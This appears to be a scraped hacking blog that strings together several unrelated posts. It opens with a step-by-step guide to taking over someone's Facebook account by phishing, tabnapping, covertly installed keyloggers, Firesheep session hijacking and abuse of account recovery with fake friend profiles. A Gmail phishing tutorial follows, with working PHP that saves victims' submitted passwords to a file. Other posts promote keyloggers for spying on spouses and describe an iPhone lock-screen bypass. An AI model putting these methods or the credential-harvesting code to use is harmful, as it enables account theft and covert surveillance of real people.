How to hack Facebook account

1: phishing:- Phishing or fake page hacking is the most widely used hacking trick for any type of accounts of website. It can also be implemented as in this case too.  Read my previous post on phishing to learn it and download facebook phishing page from below. That post was specially for Gmail. The same process will be applied in the case of faceook too. you only need to save facebook login page to your system and make changes to form element of action as per in my that post. 
you can also use Tabnapping . This is also a type of phishing but it will make it easier to send your fake page to the victim. Download Tabnapping script from this link: TabNapping Script . Read more about Tabnapping here 


IMPORTANT: sending fake page in case of simple case is not so easy. I am suggesting you an effective way of doing that. You get facebook notification emails. Use the format of that email address but replacing the URL with your fake URL ;)


Download facebook phishing page here:
Download


2: Keylogger:- Keylogger is another useful tool to hack someone's facebook account. If you do not know about keyloggers read here . This is the best way to hack Facebok account.download some keyloggers from this link. Kelogger download . Now it's up to you.. how you are using this tool. If you have physical access to victims system, you can manually install this tool and it will effectively work.
Note: If you do not know much about computer and programming, keylogger is the best and easiest way for you. Download the best keylogger from the link below and read its tutorial.

Download WinSpy and read How to hack facebook with keylogger


NOTE: Never search for the free or crack. Because that will not work. Some hackers also hosted it for free with Trojan. When you will use those free hosted on some file hosting server, you are taking risk with your facebook account which can be hacked with that trojan. So download only with the official link given above.
 
3: Firesheep:- If your victim uses unsecure wireless network then you can hack him easily by using mozilla firefox and a simple firefox plugin. Firesheep. read this post to know about firesheep and dowload it from that post. Firesheep . For college campus, this tool is easiest to use and best to hack. use this tool to gain access to any of the person using the same unsecure wireless network.


4: Hack Facebook's primary email address:- Hacking someone's email account also need above described methods (phishing, keylogger, firesheep) but you can also hack it by using forgot password and then by guessing his security question. Many times people use simple security questions which are easy to guess. If you know him/her personally, you can easily guess.


5: Facebook's can't access account option:- there is an recovery option in Facebook account. You can mention that your primary email address is also hacked. Then they will ask you many questions regarding that account. as some name of friends, account holder's some personal information etc. If you know about victim well, you can be able to answer all those question. then facebook will ask you for new email address for password recovery. Give any email address which you can access. 


Facebook also has a recovery option with four of your friends in case of lost access to recovery email and recovery number. So you can use four of his/her friends to recover his account on any new email id specified by you. For this you can either use some of existing friends on that profile or can use four fake profiles and add that person.


These are some ways of hacking Facebook account. There may be more but this time only these are in my mind. :P
if i will remember any other method i will update this post..


if you like this post please do comment  :)

How to create gmail phishing page

Phishing is one of the best way to hack gmail account. I had already posted some articles on phishing but few of those are not available due to post loss in website transfer. So i am writing an article again.


Download the phishing page from HERE


To create phishing page of gmail, first of all open gmail in your browser. Then click on file and then save as.





Now you have saved gmail login page to your system.


Now open the saved page in notepad or or any other html editor tool. Now search for form tag <form


You will see some thing like this <form id="gaia_loginform" action="https://accounts.google.com/ServiceLoginAuth" method="post"> The form is set to send the data to url given in action attribute.


Change action attribute to write.php


<form id="gaia_loginform" action="write.php" method="post"> Now form will send data to your write.php


Now create a file write.php in the same directory and write

<?php
header("Location: http://www.gmail.com/");
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Now create an account in a free hosting that support php and upload all the files to the server.

Advanced Keylogger Softwares 2012

Keylogger software used to be exactly what the name implied; software to monitor keystrokes. Back in the days of MS-DOS this was enough but now, in the days of Youtube, Facebook & Skype, keylogger software has had to evolve to keep up. There are a number of reasons you'd need to monitor your computer while your away, a cheating spouse or lazy employees to name a couple, and in 2012, keylogger software (now more commonly referred to as 'computer monitoring software') can monitor almost every aspect of computer activity.

 Of course, the basis of all computer monitoring software will be the keystroke logging function. Usually implemented with something called a 'key hook', most keyloggers will monitor all keystrokes pressed, along with the name of the application they were typed in, and the date and time that the strokes were typed.

The next most common feature, along with the keystroke logging will be application logging. Most modern computer monitoring software will monitor all applications used, along with the length of use and the date and time of use. Screenshots can also be taken whenever a new application is launched, or when a new window becomes active, so you can see exactly what's going on on the screen. Most software also allows you adjust the settings to take a screenshot every X seconds.

The above three functions usually make up the basis of the average keylogger, but as we mentioned, in this modern age we need to be able to monitor a lot more. These days, most people use their computers solely for online reasons. Whether it's Facebook, shopping, chatting or emailing, computer monitoring software in 2012 can monitor it. Web monitoring will monitor the name of the website visited, the address of the website visited and the date and time of the visit. Most software will take a snapshot of the visited website as well.

File and printer monitoring are especially important if you're looking to monitor the computer activity in a work environment. File monitoring will usually monitor new, saved, opened, copied and deleted files, along with the time and date of the action. Similarly, printer monitoring will usually keep a log of all documents printed and the name of the printer they were sent to, and yes, you guessed it; the date and time the document was printed!

One last feature that is common in most modern keyloggers is the clipboard monitoring. Anything that's copy and pasted will be monitored here, with the name of the application it was copied from and pasted to.

Of course, features vary between developers but these are the main components of computer monitoring software in 2012. You'll find some extra features with some software, microphone recording and webcam recording are sometimes seen, but with the features mentioned you can get a good idea of everything that's happened while you've been away.

Make iPhone a penetration testing tool

[Nicholas Petty] has posted a guide to setting up your iPhone as a penetration tester. You already carry it around with you and, although not too beefy, it does have the hardware you need to get the job done. So if you’re not interested in building a drone or carrying around a boxy access point try this out. The first step is to jailbreak your device and setup OpenSSH so that you can tunnel in for the rest of the setup. From there the rest of the setup is just acquiring build tools and compiling pentesting programs like Aircrack-ng, Ettercap, Nikto2, and the Social Engineering Toolkit. You’ll be up to no good testing your wireless security in no time.

Security flaw bypasses iPhone lock screen

It looks like the iPhone lock screen provides just a marginal level of protection. [Jordand321] discovered a key combination that opens the contact app on a locked iPhone. Just tap the emergency call button, enter the pound sign three times (###), then tap call and immediately tap the lock key on the top of the phone. 
You don’t get access to everything on the device. But this does give an attacker access to all of your contact data and allows that person to make any calls they desire.

Location tracking? ‘Droid does

Last week, the Internet was alight with stories of iPhone location tracking. While this wasn’t exactly breaking news in security circles, it was new information to many people out there. Lots of blogs were full of commentary on the situation, including ours, with many Android users chiming in saying, “Android doesn’t do that”.
Well, that’s not entirely true – the playing field is far more level than most people would like to admit.
Android does have the same tracking capability, as do Windows Mobile phones for that matter. Both companies also monitor the cell towers you have connected to, as well as which Wi-Fi hotspots you have passed by. All three companies anonymize the data, though they do assign a unique ID to your location details in order to tell you apart from other users.
Where things really differ is in regards to how much information is stored. Microsoft claims that they only store the most recent location entry, while Andriod systems store the 200 most recent Wi-Fi hotspot locations as well as the most recent 50 cell towers.
At the end of the day each vendor does allow you to opt out of the tracking services, and if you are seriously concerned about the data they are tracking, you can always periodically wipe the information from your handset, should you desire.

New Siri hack controls your car

Siri can make appointments, tell you the weather, but now she can start your car as well!
After we showed you how Siri could be hacked to use a custom proxy and execute custom commands, we knew it wouldn’t be long before additional hacks would start rolling in. [Brandon Fiquett] thought it would be great if Siri could remotely control his car, so he built this functionality into Siri using [Pete’s] proxy software.
The hack relies on the Viper remote start system he had installed in his car, along with a few modules loaded into his proxy server. His proxy server tweaks allow Siri to interpret a preset list of commands such as “Vehicle Start” and “Vehicle Arm/Disarm”, relaying the commands to the Viper SmartStart module.
We imagine that the back-end functionality is not unlike the existing SmartStart iOS app, but it looks like [Brandon] beat Viper to the game since Siri has not been made available to 3rd party developers as of yet.
Check out the video below to see Siri in action, then be sure to swing by his web site for additional videos as well as the code that makes this possible.

Siri as a lippy and sometimes profane television remote

If the addition of Siri to your iPhone has given you a somewhat-real life companion (and hope that you might not be forever alone) this hack is right up your alley. [Todd Treece] built a hardware fixiture for the living room which bridges the gap between Apple’s new digital assitant and your television.
The box itself is an Arduino with a WiFly shield and the hardware necessary to make it a universal infrared remote control. He mounted it on the underside of his end table, with the IR LED in line-of-sight for the television. Using SiriProxy he’s added functionality that lets you request a channel change either by the name of the network, or the channel number.
As you can see in the video after the break, Siri has some strong opinions on the quality of programming for certain channels. That and contempt for your inability to just change the channel yourself. But this setup does augment your remote control experience by giving you a synopsis of what’s playing right now for the channel you’ve requested.

Do you really know Phishing?

When i started this security blog more than 20 months ago, i was good in hacking stuffs and used to play with some common hacking methods. At that time i really enjoy phishing and trojans. Binding torjans with FUD cryptors and then playing with friend's computers was really a nice prank for me.
Now the time is changed a lot. I saw many school students claiming to be hacker (but I don't think i am) and posting some bad comments on my older phishing posts. According to these new hackers, Phishing is the old way and people are not going to give your password in the fake login pages. This force me to think whether they really know the significance of the word "hacker".


If you see the latest cyber crime report, then you will see that Phishing is the main attack on all these cyber crimes. Most of the DNS poisioning attack leads to phishing pages. Brazilian bank account hacking is the most recent example. That was also a fake login page of the bank on the other domain. But it leads to the hacking of thousands of bank account. Do you still think the phishing is dead?


Few days back, Norton published a report about a fake software vendor website selling some popular softwares for a huge amount of discount. This fake website have all the things which can prove it as a trusted vendor. But the payment of the website is suspicious. When a user wanted to buy a software for this huge discount, he was redirected to the payment gatway asking for credit cards info. But the gatway was not the official and trusted. Website was storing all the secure credit card data which it later used for malicious purpose.The website was a phishig website which was giving this kind of software offers to get users credi card data. This was the high level of phishing without any kind of fake login page. DO you still think you know the phshing well.


For those blah blah blah hackers who are easy to find on facebook, phishing is just creating fake login page and is dead. But for hackers, phishing something which is most dangerous.


NOTE:
This is my personal advice not to pay on any website until you find a known secure payment gateway. Always verify the payment gateway before paying. If you are not sure about the payment gateway, see the URL on the address bar of the page which is asking for your credit card info. Search about the this domain in the Google and see the results whether it is a payment gateway of a phishing scam.

Hacking Webpages: The Ultimate Guide

Well sd wrote one of the most helpful unix text files in hacker space but with

 the mail that we recieved after the release of our famous 36 page Unix Bible we

 realised that unix isn't for everybody so we decided that we should write on 

another aspect of hacking..... Virtual Circuit and Psychotic is proud to release,

 "Hacking Webpages With a few Other Techniques."  We will discuss a few various 

ways of hacking webpages and getting root.  We are also going to interview and 

question other REAL hackers on the subjects.

Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through anonymous 

ftp access into a webpage. First you need learn a little about the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

Hacking kit 2.0

This summary is not available. Please click here to view the post.

Advanced SQL Injection In SQL Server Applications